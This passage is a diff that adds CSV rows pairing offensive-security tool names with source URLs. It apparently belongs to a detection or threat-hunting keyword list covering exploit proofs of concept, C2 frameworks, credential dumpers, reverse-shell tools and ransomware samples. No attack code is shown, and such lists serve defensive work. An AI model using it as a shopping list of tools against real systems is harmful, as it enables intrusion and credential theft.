+"POC","https://github.com/timwr/CVE-2016-5195"
+"poc","https://github.com/Trackflaw/CVE-2023-23397"
+"POC","https://github.com/carlosevieira/Dirty-Pipe"
+"POC","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE"
+"POC","https://github.com/colincowie/Safer_PoC_CVE-2022-22965"
+"POC","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker"
+"POC","https://github.com/bbaranoff/CVE-2022-0847"
+"POC","https://github.com/Bonfee/CVE-2022-0995"
+"POC","https://github.com/drgreenthumb93/CVE-2022-30190-follina"
+"POC","https://github.com/dunderhay/CVE-2020-5902"
+"POC","https://github.com/exrienz/DirtyCow"
+"POC","https://github.com/Crusaders-of-Rust/CVE-2022-0185"
+"POC","https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit"
+"POC","https://github.com/cube0x0/noPac"
+"POC","https://github.com/Ayrx/CVE-2021-4034 "
+"POC","https://github.com/4luc4rdr5290/CVE-2022-0847"
+"POC","https://github.com/ahrixia/CVE_2022_0847"
+"POC","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits"
+"POC","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5"
+"POC","https://github.com/0tt7/CVE-2022-23131"
+"POC","https://github.com/1mxml/CVE-2022-23131"
+"POC","https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit"
+"POC","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE"
+"POC","https://github.com/Ayrx/CVE-2021-4034"
+"POC","https://github.com/antx-code/CVE-2022-0847"
+"POC","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell"
+"POC","https://github.com/aqhmal/CVE-2020-5902-Scanner"
+"POC","https://github.com/Fa1c0n35/zabbix-cve-2022-23131"
+"POC","https://github.com/KaLendsi/CVE-2022-21882"
+"POC","https://github.com/kh4sh3i/Spring-CVE"
+"POC","https://github.com/knqyf263/CVE-2022-0847"
+"POC","https://github.com/JMousqueton/PoC-CVE-2022-30190"
+"POC","https://github.com/jweny/zabbix-saml-bypass-exp"
+"poc","https://github.com/ka7ana/CVE-2023-23397"
+"POC","https://github.com/lucksec/CVE-2022-0847"
+"POC","https://github.com/luijait/PwnKit-Exploit"
+"POC","https://github.com/michaelpoznecki/zerologon"
+"POC","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed"
+"POC","https://github.com/L0ading-x/cve-2022-23131"
+"POC","https://github.com/lcashdol/Exploits"
+"POC","https://github.com/jiansiting/CVE-2020-5902"
+"POC","https://github.com/gottburgm/Exploits"
+"POC","https://github.com/gyaansastra/CVE-2022-0847"
+"POC","https://github.com/hacksysteam/CVE-2023-21608"
+"POC","https://github.com/febinrev/dirtypipez-exploit"
+"POC","https://github.com/FireFart/dirtycow"
+"POC","https://github.com/gbonacini/CVE-2016-5195"
+"POC","https://github.com/initstring/dirty_sock"
+"POC","https://github.com/ItsNee/Follina-CVE-2022-30190-POC"
+"POC","https://github.com/jas502n/CVE-2020-5902"
+"poc","https://github.com/Hashi0x/PoC-CVE-2023-21554"
+"POC","https://github.com/imfiver/CVE-2022-0847"
+"POC","https://github.com/Immersive-Labs-Sec/nimbuspwn"
+"poisontap","https://github.com/samyk/poisontap"
+"polenum","https://salsa.debian.org/pkg-security-team/polenum"
+"portscan","https://github.com/zs5460/portscan"
+"poshc2","https://github.com/nettitude/PoshC2"
+"POSTDump","https://github.com/YOLOP0wn/POSTDump"
+"PowerBruteLogon","https://github.com/DarkCoderSc/PowerBruteLogon"
+"powerextract","https://github.com/powerseb/PowerExtract"
+"PowerForensics","https://github.com/Invoke-IR/PowerForensics"
+"PowerLessShell","https://github.com/Mr-Un1k0d3r/PowerLessShell"
+"Powermad","https://github.com/Kevin-Robertson/Powermad"
+"PowerMemory","https://github.com/giMini/PowerMemory"
+"PowerOPS","https://github.com/fdiskyou/PowerOPS"
+"power-pwn","https://github.com/mbrg/power-pwn"
+"PowerSCCM","https://github.com/PowerShellMafia/PowerSCCM"
+"PowerSharpPack","https://github.com/S3cur3Th1sSh1t/PowerSharpPack"
+"PowerShdll","https://github.com/p3nt4/PowerShdll"
+"powershell","https://github.com/theyoge/AD-Pentesting-Tools/blob/main/Invoke-SDPropagator.ps1"
+"powershell","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory"
+"powershell","https://github.com/reveng007/C2_Server"
+"powershell","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
+"powershell","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/"
+"powershell","N/A"
+"powershell","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/"
+"powershell","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/"
+"powershell","https://github.com/byt3bl33d3r/CrackMapExec"
+"powershell","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz"
+"powershell","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference"
+"powershell","https://gist.github.com/analyticsearch/7453d22d737e46657eb57c44d5cf4cbb"
+"powershell","https://github.com/Pennyw0rth/NetExec"
+"powershell","https://github.com/Porchetta-Industries/CrackMapExec"
+"powershell","https://github.com/ice-wzl/wmiexec2"
+"powershell","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1"
+"PowerShellArsenal","https://github.com/mattifestation/PowerShellArsenal"
+"PowershellKerberos","https://github.com/MzHmO/PowershellKerberos"
+"PowerShell-Suite","https://github.com/FuzzySecurity/PowerShell-Suite"
+"PowerShx","https://github.com/iomoath/PowerShx"
+"PowerSploit","https://github.com/PowerShellMafia/PowerSploit"
+"PowerStager","https://github.com/z0noxz/powerstager"
+"PowerUpSQL","https://github.com/NetSPI/PowerUpSQL"
+"powerview","https://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps1"
+"powerview","https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon"
+"PP VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"PPLBlade","https://github.com/tastypepperoni/PPLBlade"
+"ppldump","https://github.com/itm4n/PPLdump"
+"PPLFault","https://github.com/gabriellandau/PPLFault"
+"PPLKiller","https://github.com/RedCursorSecurityConsulting/PPLKiller"
+"Prime VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"primusC2","https://github.com/Primusinterp/PrimusC2"
+"printspoofer","https://github.com/itm4n/PrintSpoofer"
+"Priv2Admin","https://github.com/gtworek/Priv2Admin"
+"Private Internet Access","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"PrivescCheck","https://github.com/itm4n/PrivescCheck"
+"PrivExchange","https://github.com/dirkjanm/PrivExchange"
+"PrivFu","https://github.com/daem0nc0re/PrivFu/"
+"PrivilegeEscalation","https://github.com/LouisVallat/PrivilegeEscalation"
+"Privileger","https://github.com/MzHmO/Privileger"
+"PrivKit","https://github.com/mertdas/PrivKit"
+"Probable-Wordlists","https://github.com/berzerk0/Probable-Wordlists"
+"procdump","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
+"Procdump","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump"
+"processhacker","https://processhacker.sourceforge.io/"
+"procmon","N/A"
+"produkey","https://www.nirsoft.net/utils/product_cd_key_viewer.html"
+"prometheus","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment"
+"Pron VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"ProxFlow","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Proxmark","https://github.com/Proxmark/proxmark3"
+"Proxy SwitchyOmega","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Proxy SwitchySharp","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"proxychains","https://github.com/haad/proxychains"
+"ProxyFlow","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"ProxyShell","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt"
+"PRT","https://github.com/RUB-NDS/PRT"
+"PS2EXE","https://github.com/MScholtes/PS2EXE"
+"PSAmsi","https://github.com/cobbr/PSAmsi"
+"PSAttack","https://github.com/jaredhaight/PSAttack"
+"PSBits","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges"
+"PSByPassCLM","https://github.com/padovah4ck/PSByPassCLM"
+"psexec","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec"
+"psloggedon","https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon"
+"Pspersist","https://github.com/TheD1rkMtr/Pspersist"
+"pspy","https://github.com/DominicBreuker/pspy"
+"PSRansom","https://github.com/JoelGMSec/PSRansom"
+"PSRecon","https://github.com/gfoss/PSRecon"
+"PSSW100AVB","https://github.com/tihanyin/PSSW100AVB"
+"pth-toolkit","https://github.com/byt3bl33d3r/pth-toolkit"
+"ptunnel-ng","https://github.com/utoni/ptunnel-ng"
+"pupy","https://github.com/n1nj4sec/pupy"
+"PureVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"PurplePanda","https://github.com/carlospolop/PurplePanda"
+"Push VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"PWCrack","https://github.com/L-codes/pwcrack-framework"
+"pwdump","https://ftp.samba.org/pub/samba/pwdump/"
+"pwn_jenkins","https://github.com/gquere/pwn_jenkins"
+"pwnagotchi","https://github.com/evilsocket/pwnagotchi"
+"pwnat","https://github.com/samyk/pwnat"
+"pwndrop","https://github.com/kgretzky/pwndrop"
+"pxethief","https://github.com/MWR-CyberSec/PXEThief"
+"py2exe","https://github.com/py2exe/py2exe"
+"pydictor","https://github.com/LandGrey/pydictor"
+"PyExec","https://github.com/OlivierLaflamme/PyExec"
+"pyGPOAbuse","https://github.com/Hackndo/pyGPOAbuse"
+"pyinstaller","https://www.pyinstaller.org/"
+"pyLAPS","https://github.com/p0dalirius/pyLAPS"
+"pymultitor","https://github.com/realgam3/pymultitor"
+"pypykatz","https://github.com/skelsec/pypykatz"
+"pyrdp","https://github.com/GoSecure/pyrdp"
+"pyshell","https://github.com/JoelGMSec/PyShell"
+"pysoserial","https://github.com/aStrowxyu/Pysoserial"
+"Python-Wordlist-Generator","https://github.com/agusmakmun/Python-Wordlist-Generator"
+"pywerview","https://github.com/the-useless-one/pywerview"
+"pywhisker","https://github.com/ShutdownRepo/pywhisker"
+"pywsus","https://github.com/GoSecure/pywsus"
+"QuasarRAT","https://github.com/quasar/Quasar"
+"qwinsta","N/A"
+"Radare2","https://github.com/radareorg/radare2"
+"RadareEye","https://github.com/souravbaghz/RadareEye"
+"RainbowCrack","http://project-rainbowcrack.com/"
+"rapid7","https://www.rapid7.com/products/nexpose/"
+"rapid7","https://www.rapid7.com/"
+"RaRCE","https://github.com/ignis-sec/CVE-2023-38831-RaRCE"
+"RasmanPotato","https://github.com/crisprss/RasmanPotato"
+"ratchatgpt","https://github.com/spartan-conseil/ratchatpt"
+"ratchatpt","https://github.com/spartan-conseil/ratchatpt"
+"rclone","https://github.com/rclone/rclone"
+"RDE1","https://github.com/g0h4n/RDE1"
+"rderzh VPN Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"RDPassSpray","https://github.com/xFreed0m/RDPassSpray"
+"RDPCredentialStealer","https://github.com/S12cybersecurity/RDPCredentialStealer"
+"RDPHijack-BOF","https://github.com/netero1010/RDPHijack-BOF"
+"RDPInception","https://github.com/mdsecactivebreach/RDPInception"
+"rdpscraper","https://github.com/x90skysn3k/rdpscraper"
+"RDPSpray","https://github.com/dafthack/RDPSpray"
+"RdpThief","https://github.com/0x09AL/RdpThief"
+"reaper","https://github.com/MrEmpy/Reaper"
+"reapoc","https://github.com/cckuailong/reapoc"
+"REC2 ","https://github.com/g0h4n/REC2"
+"recon-archy","https://github.com/shadawck/recon-archy"
+"RecycledInjector","https://github.com/florylsk/RecycledInjector"
+"Red Panda VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"red_hawk","https://github.com/Tuhinshubhra/RED_HAWK"
+"Red-Baron","https://github.com/byt3bl33d3r/Red-Baron"
+"RedGuard","https://github.com/wikiZ/RedGuard"
+"redhuntlabs","https://github.com/redhuntlabs"
+"RedHunt-OS","https://github.com/redhuntlabs/RedHunt-OS"
+"redis-rce","https://github.com/Ridter/redis-rce"
+"RedPeanut","https://github.com/b4rtik/RedPeanut"
+"RedPersist","https://github.com/mertdas/RedPersist"
+"red-python-scripts","https://github.com/davidbombal/red-python-scripts"
+"RedTeam_toolkit","https://github.com/signorrayan/RedTeam_toolkit"
+"RedTeam_toolkit","https://github.com/MayankPandey01/Jira-Lens"
+"Red-Teaming-Toolkit","https://github.com/infosecn1nja/Red-Teaming-Toolkit"
+"red-team-scripts","https://github.com/threatexpress/red-team-scripts"
+"ReelPhish","https://github.com/fireeye/ReelPhish"
+"ReflectiveNtdll","https://github.com/reveng007/ReflectiveNtdll"
+"RefleXXion","https://github.com/hlldz/RefleXXion"
+"reg","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
+"reg","https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat"
+"reg","N/A"
+"reg","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md"
+"reg","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz"
+"reg","https://github.com/ice-wzl/wmiexec2"
+"reg","https://github.com/Pennyw0rth/NetExec"
+"reGeorg","https://github.com/sensepost/reGeorg"
+"regreeper","https://github.com/tccontre/Reg-Restore-Persistence-Mole"
+"remote-method-guesser","https://github.com/qtc-de/remote-method-guesser"
+"ren","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin"
+"rengine","https://github.com/yogeshojha/rengine"
+"responder","https://github.com/SpiderLabs/Responder"
+"reverse-shell-generator","https://github.com/0dayCTF/reverse-shell-generator"
+"ridrelay","https://github.com/skorov/ridrelay"
+"rmmod","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml"
+"ROADtools","https://github.com/dirkjanm/ROADtools"
+"Rock-ON","https://github.com/SilverPoision/Rock-ON"
+"RoguePotato","https://github.com/antonioCoco/RoguePotato"
+"RogueSploit","https://github.com/h0nus/RogueSploit"
+"ropfuscator","https://github.com/ropfuscator/ropfuscator"
+"routerpasswords.com","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md"
+"routerscan","https://en.kali.tools/?p=244"
+"routersploit","https://github.com/threat9/routersploit"
+"rpcclient","https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html"
+"rpivot","https://github.com/klsecservices/rpivot"
+"rsg","https://github.com/mthbernardes/rsg"
+"rshijack","https://github.com/kpcyrd/rshijack"
+"rsocx","https://github.com/b23r0/rsocx"
+"rsync","https://attack.mitre.org/techniques/T1105/"
+"Rubeus","https://github.com/GhostPack/Rubeus"
+"ruby","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md"
+"Rudrastra","https://github.com/SxNade/Rudrastra"
+"ruler","https://github.com/sensepost/ruler"
+"RunasCs","https://github.com/antonioCoco/RunasCs/"
+"RunasCs","https://github.com/antonioCoco/RunasCs"
+"RunAsWinTcb","https://github.com/tastypepperoni/RunAsWinTcb"
+"rundll32","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml"
+"rundll32","https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence"
+"RuralBishop","https://github.com/rasta-mouse/RuralBishop"
+"rustcat","https://github.com/robiot/rustcat"
+"RustHound","https://github.com/OPENCYBER-FR/RustHound"
+"RusVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"rwxfinder","https://github.com/pwnsauc3/RWXFinder"
+"S3Scanner","https://github.com/sa7mon/S3Scanner"
+"S4UTomato","https://github.com/wh0amitz/S4UTomato"
+"SaferVPN Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"SafetyKatz","https://github.com/GhostPack/SafetyKatz"
+"Salsa-tools","https://github.com/Hackplayers/Salsa-tools"
+"samba","https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html"
+"samdump","https://github.com/nyxgeek/classic_hacking_tools"
+"samdump2","https://salsa.debian.org/pkg-security-team/samdump2"
+"SamDumpCable","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable"
+"sam-the-admin","https://github.com/WazeHell/sam-the-admin/tree/main/utils"
+"SAP_GW_RCE_exploit","https://github.com/chipik/SAP_GW_RCE_exploit"
+"sc","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/"
+"scan4all","https://github.com/hktalent/scan4all"
+"scanless","https://github.com/vesche/scanless"
+"Scanners-Box","https://github.com/We5ter/Scanners-Box"
+"ScareCrow","https://github.com/optiv/ScareCrow"
+"sccmdecryptpoc","https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1"
+"sccmhunter","https://github.com/garrettfoster13/sccmhunter"
+"ScheduleRunner","https://github.com/netero1010/ScheduleRunner"
+"schtasks","N/A"
+"SCMUACBypass","https://github.com/rasta-mouse/SCMUACBypass"
+"scp","https://attack.mitre.org/techniques/T1105/"
+"ScreenConnect","screenconnect.com"
+"ScreenConnect","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/"
+"ScriptSentry","https://github.com/techspence/ScriptSentry"
+"scshell","https://github.com/Mr-Un1k0d3r/SCShell"
+"seatbelt","https://github.com/GhostPack/Seatbelt"
+"SecLists","https://github.com/danielmiessler/SecLists"
+"secretfinder","https://github.com/m4ll0k/SecretFinder"
+"securesocketfunneling","https://securesocketfunneling.github.io/ssf/#home"
+"security-onion","https://github.com/Security-Onion-Solutions/security-onion"
+"sed","N/A"
+"SeeYouCM-Thief","https://github.com/trustedsec/SeeYouCM-Thief"
+"SeManageVolumeExploit","https://github.com/CsEnox/SeManageVolumeExploit"
+"sendspace.com","https://twitter.com/mthcht/status/1660953897622544384"
+"SessionGopher","https://github.com/Arvanaghi/SessionGopher"
+"SessionSearcher","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher"
+"Seth","https://github.com/SySS-Research/Seth"
+"SetProcessInjection","https://github.com/OtterHacker/SetProcessInjection"
+"SetupVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"sftp","https://attack.mitre.org/techniques/T1105/"
+"ShadowForgeC2","https://github.com/0xEr3bus/ShadowForgeC2"
+"ShadowSpray","https://github.com/ShorSec/ShadowSpray"
+"SharpAzbelt","https://github.com/redskal/SharpAzbelt"
+"SharpBlackout","https://github.com/dmcxblue/SharpBlackout"
+"SharpBlock","https://github.com/CCob/SharpBlock"
+"SharpC2","https://github.com/rasta-mouse/SharpC2"
+"SharpChromium","https://github.com/djhohnstein/SharpChromium"
+"SharpClipHistory","https://github.com/FSecureLABS/SharpClipHistory"
+"SharpCloud","https://github.com/chrismaddalena/SharpCloud"
+"sharpcollection","https://github.com/Flangvik/SharpCollection"
+"SharpCookieMonster","https://github.com/m0rv4i/SharpCookieMonster"
+"SharpDllProxy","https://github.com/Flangvik/SharpDllProxy"
+"SharpDomainSpray","https://github.com/HunnicCyber/SharpDomainSpray"
+"SharpDoor","https://github.com/infosecn1nja/SharpDoor"
+"SharpDPAPI","https://github.com/GhostPack/SharpDPAPI"
+"SharpDXWebcam","https://github.com/snovvcrash/SharpDXWebcam"
+"SharpEfsPotato","https://github.com/bugch3ck/SharpEfsPotato"
+"SharPersist","https://github.com/fireeye/SharPersist"
+"SharpExfiltrate","https://github.com/Flangvik/SharpExfiltrate"
+"SharpFtpC2","https://github.com/DarkCoderSc/SharpFtpC2"
+"SharpGmailC2","https://github.com/reveng007/SharpGmailC2"
+"SharpGPOAbuse","https://github.com/FSecureLABS/SharpGPOAbuse"
+"SharpHide","https://github.com/outflanknl/SharpHide"
+"sharphound","https://github.com/BloodHoundAD/SharpHound"
+"SharpLAPS","https://github.com/swisskyrepo/SharpLAPS"
+"SharpLDAP","https://github.com/mertdas/SharpLDAP"
+"SharpLdapRelayScan","https://github.com/klezVirus/SharpLdapRelayScan"
+"SharpNoPSExec","https://github.com/juliourena/SharpNoPSExec"
+"SharpPack","https://github.com/mdsecactivebreach/SharpPack"
+"SharpPrintNightmare","https://github.com/cube0x0/CVE-2021-1675"
+"SharpRDP","https://github.com/0xthirteen/SharpRDP"
+"SharpRDPHijack","https://github.com/bohops/SharpRDPHijack"
+"SharpSCCM","https://github.com/Mayyhem/SharpSCCM/"
+"SharpShellPipe","https://github.com/DarkCoderSc/SharpShellPipe"
+"SharpShooter","https://github.com/mdsecactivebreach/SharpShooter"
+"SharpSocks","https://github.com/nettitude/SharpSocks"
+"SharpSploit","https://github.com/cobbr/SharpSploit"
+"SharpSpray","https://github.com/jnqpblc/SharpSpray"
+"SharpSQLPwn","https://github.com/lefayjey/SharpSQLPwn"
+"SharpStay","https://github.com/0xthirteen/SharpStay"
+"Sharp-Suite","https://github.com/FuzzySecurity/Sharp-Suite"
+"SharpSword","https://github.com/OG-Sadpanda/SharpSword"
+"SharpSystemTriggers","https://github.com/cube0x0/SharpSystemTriggers"
+"SharpTerminator","https://github.com/mertdas/SharpTerminator"
+"SharpToken","https://github.com/BeichenDream/SharpToken"
+"SharpUnhooker","https://github.com/GetRektBoy724/SharpUnhooker"
+"SharpUp","https://github.com/GhostPack/SharpUp"
+"SharpView","https://github.com/tevora-threat/SharpView/"
+"SharpWSUS","https://github.com/nettitude/SharpWSUS"
+"SharPyShell","https://github.com/antonioCoco/SharPyShell"
+"shell","N/A"
+"shell","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml"
+"shell","https://attack.mitre.org/techniques/T1562/001/"
+"Shell3er","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1"
+"Shellcode-Downloader-CreateThread-Execution","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution"
+"Shellcode-Hide","https://github.com/TheD1rkMtr/Shellcode-Hide"
+"Shellcode-Loader","https://github.com/ReversingID/Shellcode-Loader"
+"shellcodetester","https://github.com/helviojunior/shellcodetester"
+"ShellGhost","https://github.com/lem0nSec/ShellGhost"
+"ShellPop","https://github.com/0x00-0x00/ShellPop"
+"shhmon","https://github.com/matterpreter/Shhmon"
+"shodan.io","https://www.shodan.io/"
+"shred","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml"
+"ShuckNT","https://github.com/yanncam/ShuckNT"
+"SigPloit","https://github.com/SigPloiter/SigPloit"
+"SilentHound","https://github.com/layer8secure/SilentHound"
+"SilentMoonwalk","https://github.com/klezVirus/SilentMoonwalk"
+"silenttrinity","https://github.com/byt3bl33d3r/SILENTTRINITY"
+"SillyRAT","https://github.com/hash3liZer/SillyRAT"
+"simplehttpserver","https://docs.python.org/2/library/simplehttpserver.html"
+"Simple-Reverse-Shell","https://github.com/tihanyin/Simple-Reverse-Shell/"
+"SimplyEmail","https://github.com/SimplySecurity/SimplyEmail"
+"Sitadel","https://github.com/shenril/Sitadel"
+"skymen.info","https://www.skymem.info"
+"Slackor","https://github.com/Coalfire-Research/Slackor"
+"SlinkyCat","https://github.com/LaresLLC/SlinkyCat"
+"sliver","https://github.com/trustedsec/SliverKeylogger"
+"sliver","https://github.com/BishopFox/sliver"
+"SlowLoris","https://github.com/gkbrk/slowloris"
+"SmashedPotato","https://github.com/Cn33liz/SmashedPotato"
+"smbcrawler","https://github.com/SySS-Research/smbcrawler"
+"SMBeagle","https://github.com/punk-security/SMBeagle"
+"SMBetray","https://github.com/quickbreach/SMBetray"
+"SMBGhost","https://github.com/ollypwn/SMBGhost"
+"SMBGhost_RCE_PoC","https://github.com/chompie1337/SMBGhost_RCE_PoC"
+"smbmap","https://github.com/ShawnDEvans/smbmap"
+"smb-reverse-shell","https://github.com/r1cksec/smb-reverse-shell"
+"smb-scanner","https://github.com/TechnicalMujeeb/smb-scanner"
+"SMBSR","https://github.com/oldboy21/SMBSR"
+"SMShell","https://github.com/persistent-security/SMShell"
+"smtp-user-enum","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum"
+"smuggler.py","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py"
+"Sn1per","https://github.com/1N3/Sn1per"
+"Snaffler","https://github.com/SnaffCon/Snaffler"
+"SnaffPoint","https://github.com/nheiniger/SnaffPoint"
+"snallygaster","https://github.com/hannob/snallygaster"
+"SniffAir","https://github.com/Tylous/SniffAir"
+"sniffer","https://github.com/chenjiandongx/sniffer"
+"sniffglue","https://github.com/kpcyrd/sniffglue"
+"snmpcheck","http://www.nothink.org/codes/snmpcheck/index.php"
+"snmpwalk","https://wiki.debian.org/SNMP"
+"snmpwn","https://github.com/hatlord/snmpwn"
+"socat","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets"
+"socat","N/A"
+"socat","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
+"socat","https://github.com/craSH/socat"
+"socat","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md"
+"Social VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"SocialBox-Termux","https://github.com/umeshshinde19/instainsane"
+"SocialBox-Termux","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl"
+"SocialBox-Termux","https://github.com/samsesh/SocialBox-Termux"
+"SocialBox-Termux","https://github.com/Ha3MrX/Gemail-Hack"
+"SocialBox-Termux","https://github.com/samsesh/insta-bf"
+"social-engineer-toolkit","https://github.com/trustedsec/social-engineer-toolkit"
+"SocialPwned","https://github.com/MrTuxx/SocialPwned"
+"softperfect networkscanner","https://www.softperfect.com/products/networkscanner/"
+"Soul VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"SpaceRunner","https://github.com/Mr-B0b/SpaceRunner"
+"SpamChannel","https://github.com/byt3bl33d3r/SpamChannel"
+"Spartacus","https://github.com/Accenture/Spartacus"
+"spellbound","https://github.com/mhuzaifi0604/spellbound"
+"spiderfoot","https://www.spiderfoot.net/"
+"Splashtop","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/"
+"SplunkWhisperer2","https://github.com/cnotin/SplunkWhisperer2"
+"SpookFlare","https://github.com/hlldz/SpookFlare"
+"spoolsploit","https://github.com/BeetleChunks/SpoolSploit"
+"Spray365","https://github.com/MarkoH17/Spray365"
+"sprayhound","https://github.com/Hackndo/sprayhound"
+"SprayingToolkit","https://github.com/byt3bl33d3r/SprayingToolkit"
+"spraykatz","https://github.com/aas-n/spraykatz"
+"Spring4Shell","https://github.com/reznok/Spring4Shell-POC"
+"Spring4Shell","https://github.com/TheGejr/SpringShell"
+"Spring4Shell","https://github.com/BobTheShoplifter/Spring4Shell-POC"
+"Spring4Shell","https://github.com/DDuarte/springshell-rce-poc"
+"SpringCore0day","https://github.com/craig/SpringCore0day"
+"spring-core-rce","https://github.com/Mr-xn/spring-core-rce"
+"sqli-labs","https://github.com/Audi-1/sqli-labs"
+"sqlipy","https://github.com/codewatchorg/sqlipy"
+"SQLiScanner","https://github.com/0xbug/SQLiScanner"
+"sqlmap","https://github.com/sqlmapproject/sqlmap"
+"SQLmate","https://github.com/s0md3v/sqlmate"
+"sqlninja","http://sqlninja.sourceforge.net/"
+"SQLRecon","https://github.com/skahwah/SQLRecon"
+"sRDI","https://github.com/monoxgas/sRDI"
+"ss","N/A"
+"ssfd","https://github.com/securesocketfunneling/ssf"
